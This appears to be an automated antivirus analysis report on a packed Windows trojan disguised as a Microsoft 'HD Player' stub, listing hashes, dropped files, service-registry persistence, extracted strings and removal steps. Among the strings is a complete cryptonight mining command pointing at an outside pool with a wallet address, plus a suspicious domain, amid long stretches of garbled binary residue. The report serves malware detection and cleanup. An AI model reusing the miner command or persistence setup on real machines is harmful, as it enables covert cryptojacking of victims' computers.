MD5: feb553e293ec4fda92a8991683945aea
SHA1: 4af88b2ea5ab36b94e327a3c40d0b9cac99e4657
SHA256: 46dba6ebb695434d7994f5531134a29b70b7186f8b043dbfce7c8201a0e9f499
SSDeep: 98304:2esNqIUciP gBgFVsw9lYAA59SciZgcUv73FG2:IxUcvA59ziZgcULFG
Size: 3739648 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PolyEnE001byLennartHedlund, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6
Company: no certificate found
Created at: 2016-03-23 13:06:07
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

srvany.exe:484
%original file name%.exe:852

The Trojan injects its code into the following process(es):

Systmsi.exe:168

Mutexes

The following mutexes were created/opened:

ShimCacheMutex

File activity

The process %original file name%.exe:852 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Systmsi.exe (7972 bytes)
%System%\srvany.exe (8 bytes)

Registry activity

The process srvany.exe:484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 79 95 64 02 79 97 09 33 ED 34 24 1A 8B B2 B7"

The process %original file name%.exe:852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D4 18 D9 E4 A1 01 18 AD 3D B6 71 0D 63 23 B9 7B"

[HKLM\System\CurrentControlSet\Services\Mmservess\Parameters]
"Application" = "c:\windows\svchoss.exe"
"AppDirectory" = "c:\windows\"

The process Systmsi.exe:168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 1A FA 39 60 11 8E 39 94 83 FC 6F A6 C9 56 A9"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Microsoft Corporation
Product Name: HD Player
Product Version: 6.1.7600.16385
Legal Copyright: (c) Microsoft Corporation. All rights reserved.
Legal Trademarks:
Original Filename: WINHLP32.EXE
Internal Name: WINHSTB
File Version: 6.1.7600.16385 (win7_rtm.090713-1255)
File Description: Windows Winhlp32 Stub
Comments:
Language: Language Neutral

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

No activity has been detected.

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

Web Traffic was not found.

The Trojan connects to the servers at the folowing location(s):

.text

`.rdata

@.data

.rsrc

t$(SSh

u.htEx

~%UVW

u$SShe

kernel32.dll

user32.dll

advapi32.dll

Advapi32.dll

Kernel32.dll

ADVAPI32.DLL

EnumWindows

RegOpenKeyExA

RegCreateKeyExA

RegCloseKey

GetServiceKeyNameA

Systmsi.exe

Systmsi.exe -a cryptonight -o stratum tcp://xmr1.crypto-pool.fr:7777 -u 43YkRcrdW8zDsMNhP29S1yF8QBqYJ5UGgPCgCXUKyHnFFD8proXWxywYgMLvxBpVb4TSN3fD9taDrbJYnPbXAg6K5kNpLiN -p x -t 0 -dbg -1

Systmssi.exe

Systmssi.exe -a cryptonight -o stratum tcp://xmr1.crypto-pool.fr:7777 -u 43YkRcrdW8zDsMNhP29S1yF8QBqYJ5UGgPCgCXUKyHnFFD8proXWxywYgMLvxBpVb4TSN3fD9taDrbJYnPbXAg6K5kNpLiN -p x -t 0 -dbg -1

.pdata

@.tls

.vmp0

.vmp1

.reloc

@.rsrc

~{DsSh

YhKsSh

.ydn8

.XHUBL

F.MDo

/%c|]

Dh%dl{i

V.Xk(b4i

[k.Wp

R7Œ

 J".yk;?

9,%u4o

gYw.Sd

ÍqC

R<Ê

%x9$ 

d.Jn1QBE

uE.kjZ

v,%xP

x_.LB}

J%f|&

d-RNC}

@9%6s

OVV%d

b.Ra18

G`.db

$,J%d

Q%U08

m6%cy1~

: %d_

D%czn

d%UH{

d-S};:

.rl=q

d~.Ty

C%dG#

Wudp

B,.Ad

,.lkG[

Uc%sV/

%d|u g:

rb;%d

N~U%doz

[2gM4|%d

-W}"6p

mA.RT

|X %u

/U\H%u

Z2.Oj

%x6t@

p8w%Ud`

)s%cK

^;%cv

.dpFD

Z.dAp

Z{%dQ

N%dT 

e]VJ

*l2%dk

.Ruvd^

.crj}

SqlE

dK.iy

.NT"m

jfFL#%dV

%dM)*wa

w%DREP

T.ldE

%f_WB

.jG1i

~l%dM

S%dJ:

.eLDO

%d_}l

\O4K

m1%xv

%d*5_]

T~U`c.Oj}

.fN; 

Y: %x

1#Hd.yn,

rudpn

.Wqdy

P%dtl

u-6Z}

%XYfa`

dS.NR

dw.hX~

K%dg#

5r8,.cU

/ .dDV

dw%Ua

1d ,.by

.dE-o

.fx}x

qWo.KoX

\(;k%d

)hg2/]Q{x%s

MA.dcS

.DfdY

"7TMÖD^

.dh>S

KERNEL32.dll

ADVAPI32.dll

9g.dO

P.bz"|

Md["5).gD

F%D'@

,d *)('&M3210/.-<@;:

</a.MT

%].IP

eNh<%dj

c@i%d

xkWebX

.kXI3

$D.bg

]BP%cnc*

sQLK

P.fNA@?k

`f%XtBt

.tTrc

J%sJ\l

8fO}eQtn%D|

%8XKF

0.cG$~

*9h 4B%S

.pD]5

*.*J\2

Ku? %C#

*f~%u

K%D@9oF1DL

.glJ(

1.czC

gsqL

l.Cx"<{

{\.Iv0jNan$

8.Ou3

BSql 

6%x^b

#.Pqv

m:\[8

tH^!.AX

l(`.DoBc"

|e%x`

jO.PaoA

`.kfa

2t b.csv

-WpCrt'

.UgHv

sIr%sBrNs{rOstrxs]riK

L.rv 

cA tIx.cA

%8Sj[C

%UL"X@

YL.FtBDrK

ÚB oFAb"

p.uW&

w=\user32.dll

WS2_32.dll

)l.iWR

T%Fj>

USER32.dll

E:\CryptoNight\bitmonero-master\src\miner\x64\CPU-Release\Crypto.pdb

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>

,Niw0.Sg

3.pQJ[8

.SjIp

2.sLi

%S!41

-i.OA

&b%xb#

.Lc\q3

o%C!Rs]

x.Lu~

L.qc7

.QG{Ml

%.ONP

"%XE*QyU

<q.eH3

.iP-.

5]%6u

YOP,%F

.gb7-

$%6s#&

,%uK]

-2.OBv

%%u{^

-i.MeR>PR

6.sf.

% .cwvGu

5.BL?r

3.uE"*8

_%9X<

.Ye1B

cSuS%S

Og#"%sS

nh.FB

s]rj%s

T -L}

7b.zW_

.vA2c

P?\ô

& .FP

o/.Uv

sSe`}%CR

D_.mRW

Kx`.rQ

I3.yO

`.lA#

1:q

O^.DM-

%D,3D

/9\:G%X

H%CQt`

2.NUr

us.QM

.WXp9

5TA%f

rt%XS

%F?;=

vwijmB%f

Kv(.rt

.kE1b

.Fv.1

`.nH0

[email protected]

.MLj2

.gue,

v.XR2

0h.fY

O-%UZq

.Lqd*

8%F.2

r.EJ@

3>L.bZ

y.Kqk

.MJ7R

G.MVo/

X@%5sG

!iQ.GL

S=%Uo

UE.eH1

s.RoG

:?B.At

7`|.mD*l

.GOA-

.qYc 

crTV

%X83(

!.AU8

.XW$]

.yA b

OSQl

2b.cX

.%Uuo

9%D(:

.ETC.

8 8$8(8,8084888

4O4

88L8U8

? ?$?(?,?0?4?8?<?@?`?

4 4$4(4@4

6p7f7x7

< <$<(<,<0<4<

7v7D7p7}7

8$;(;,;0;4;8;<;@;

7u7F7Q7

1!1%1)1-1115191

1!292?2

4$4(4,404<4

4 4$4(4,4044484<4@4

< <$<(<,<0<4<8<

< <$<(<,<0<<<@<

; <@<\<`<

0S091K1h1

0 0$0(0,0

'%djg!

E:\CryptoNight\bitmonero-master\src\miner\Release\Crypto.pdb

svchoss.exe

c:\windows\svchoss.exe

VVV.3600gz.cn

`.data

OS2SSService-%d

OS2.EXE /S /P

OS2.EXE /S /P C:\OS2\PMSHELL.EXE /C C:\OS2\PMSHELL.EXE

srvany.pdb

msvcrt.dll

C:\Windows\SysWOW64\srvany.exe

%WinDir%\SysWOW64\srvany.exe

C:\Windows\system32\srvany.exe

C:\Windows\System32\srvany.exe

RegDisableReflectionKey

RegEnableReflectionKey

%d&&'

123456789

00003333

deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly

inflate 1.1.3 Copyright 1995-1998 Mark Adler

F%*.*f

CNotSupportedException

commctrl_DragListMsg

Afx:%x:%x:%x:%x:%x

Afx:%x:%x

COMCTL32.DLL

CCmdTarget

__MSVCRT_HEAP_SELECT

Broken pipe

Inappropriate I/O control operation

Operation not permitted

GetProcessHeap

WinExec

GetWindowsDirectoryA

GetKeyState

GetViewportOrgEx

GDI32.dll

WINMM.dll

WINSPOOL.DRV

ShellExecuteA

SHELL32.dll

ole32.dll

OLEAUT32.dll

COMCTL32.dll

GetCPInfo

CreateDialogIndirectParamA

UnhookWindowsHookEx

SetWindowsHookExA

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GetViewportExtEx

comdlg32.dll

.PAVCException@@

Shell32.dll

Mpr.dll

User32.dll

Gdi32.dll

(&07-034/)7 '

?? / %d]

%d / %d]

.PAVCFileException@@

: %d]

(*.*)|*.*||

(*.WAV;*.MID)|*.WAV;*.MID|WAV

(*.WAV)|*.WAV|MIDI

(*.MID)|*.MID|

(*.txt)|*.txt|

(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG

(*.JPG)|*.JPG|PNG

(*.PNG)|*.PNG|BMP

(*.BMP)|*.BMP|GIF

(*.GIF)|*.GIF|

(*.ICO)|*.ICO|

(*.CUR)|*.CUR|

%s:%d

windows

.PAVCNotSupportedException@@

out.prn

(*.prn)|*.prn|

%d.%d

%d/%d

1.6.9

unsupported zlib version

png_read_image: unsupported transformation

%d / %d

Bogus message code %d

libpng error: %s

libpng warning: %s

1.1.3

bad keyword

libpng does not support gamma background rgb_to_gray

Palette is NULL in indexed image

(%d-%d):

%ld%c

.PAVCObject@@

.PAVCSimpleException@@

.PAVCMemoryException@@

.?AVCNotSupportedException@@

.PAVCResourceException@@

.PAVCUserException@@

.?AVCCmdTarget@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.PAVCArchiveException@@

zcÁ

c:\%original file name%.exe

#include "l.chs\afxres.rc" // Standard components

<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>

(*.*)

Windows Winhlp32 Stub

6.1.7600.16385 (win7_rtm.090713-1255)

WINHLP32.EXE

Windows

Operating System

6.1.7600.16385

Systmsi.exe_168:

.text

`.rdata

@.data

.vmp0

.vmp1

.reloc

@.rsrc

USER32.dll

WS2_32.dll

,Niw0.Sg

3.pQJ[8

.SjIp

2.sLi

%S!41

KERNEL32.dll

-i.OA

&b%xb#

.Lc\q3

o%C!Rs]

x.Lu~

L.qc7

.QG{Ml

%.ONP

"%XE*QyU

<q.eH3

.iP-.

5]%6u

YOP,%F

.gb7-

$%6s#&

,%uK]

-2.OBv

%%u{^

ADVAPI32.dll

-i.MeR>PR

6.sf.

% .cwvGu

5.BL?r

user32.dll

3.uE"*8

_%9X<

.Ye1B

cSuS%S

Og#"%sS

nh.FB

s]rj%s

T -L}

7b.zW_

.vA2c

P?\ô

& .FP

o/.Uv

sSe`}%CR

D_.mRW

Kx`.rQ

I3.yO

`.lA#

1:q

O^.DM-

%D,3D

/9\:G%X

H%CQt`

2.NUr

us.QM

.WXp9

5TA%f

rt%XS

%F?;=

vwijmB%f

Kv(.rt

.kE1b

.Fv.1

`.nH0

[email protected]

.MLj2

.gue,

v.XR2

0h.fY

O-%UZq

.Lqd*

8%F.2

r.EJ@

3>L.bZ

y.Kqk

.MJ7R

G.MVo/

X@%5sG

!iQ.GL

S=%Uo

UE.eH1

s.RoG

:?B.At

7`|.mD*l

.GOA-

.qYc 

crTV

%X83(

!.AU8

.XW$]

.yA b

OSQl

2b.cX

.%Uuo

9%D(:

.ETC.

8 8$8(8,8084888

4O4

88L8U8

? ?$?(?,?0?4?8?<?@?`?

4 4$4(4@4

6p7f7x7

< <$<(<,<0<4<

7v7D7p7}7

8$;(;,;0;4;8;<;@;

7u7F7Q7

1!1%1)1-1115191

1!292?2

4$4(4,404<4

4 4$4(4,4044484<4@4

< <$<(<,<0<4<8<

< <$<(<,<0<<<@<

; <@<\<`<

0S091K1h1

0 0$0(0,0

'%djg!

E:\CryptoNight\bitmonero-master\src\miner\Release\Crypto.pdb

<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>

Remove it with Ad-Aware

1. Click (here) to download and install Ad-Aware Free Antivirus.
2. Update the definition files.
3. Run a full scan of your computer.

Manual removal*

1. Terminate malicious process(es) (How to End a Process With the Task Manager):
   

   srvany.exe:484
   %original file name%.exe:852
   

2. Delete the original Trojan file.
   
3. Delete or disinfect the following files created/modified by the Trojan:
   

   %WinDir%\Systmsi.exe (7972 bytes)
   %System%\srvany.exe (8 bytes)

4. Reboot the computer.
   

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.